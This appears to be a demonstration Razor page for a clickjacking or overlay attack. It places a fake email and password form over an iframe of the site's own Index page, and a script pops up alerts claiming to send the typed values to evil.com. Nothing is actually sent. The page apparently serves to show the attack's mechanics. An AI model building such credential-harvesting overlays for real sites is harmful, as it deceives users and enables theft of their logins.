<div id="form-container">
    <form class="form-signin ">
        <input type="email" id="inputEmail" class="form-control" placeholder="Email address" required>
        <input type="password" id="inputPassword" class="form-control" placeholder="Password" required>
    </form>
</div>
<iframe src="@Url.Action("Index")"></iframe>
<style>
    body {
        width: 100%;
        height: 800px;
        padding: 0;
    }

    iframe {
        width: 100%;
        height: 800px;
        border: none;
    }

    #form-container {
        position: absolute;
        width: 100%;
        top: 103px;
    }
</style>
<script>
    var emailInput = document.getElementById('inputEmail');
    var hasShownEmail = false;
    emailInput.addEventListener('blur', function () {
        if (!hasShownEmail) {
            alert('sending your email "' + this.value + '" to evil.com...');
            hasShownEmail = true;
        }
    });

    var passwordInput = document.getElementById('inputPassword');
    var hasShownPassword = false;
    passwordInput.addEventListener('blur', function () {
        if (!hasShownPassword) {
            alert('sending your password "' + this.value + '" to evil.com...');
            hasShownPassword = true;
        }
    });
</script>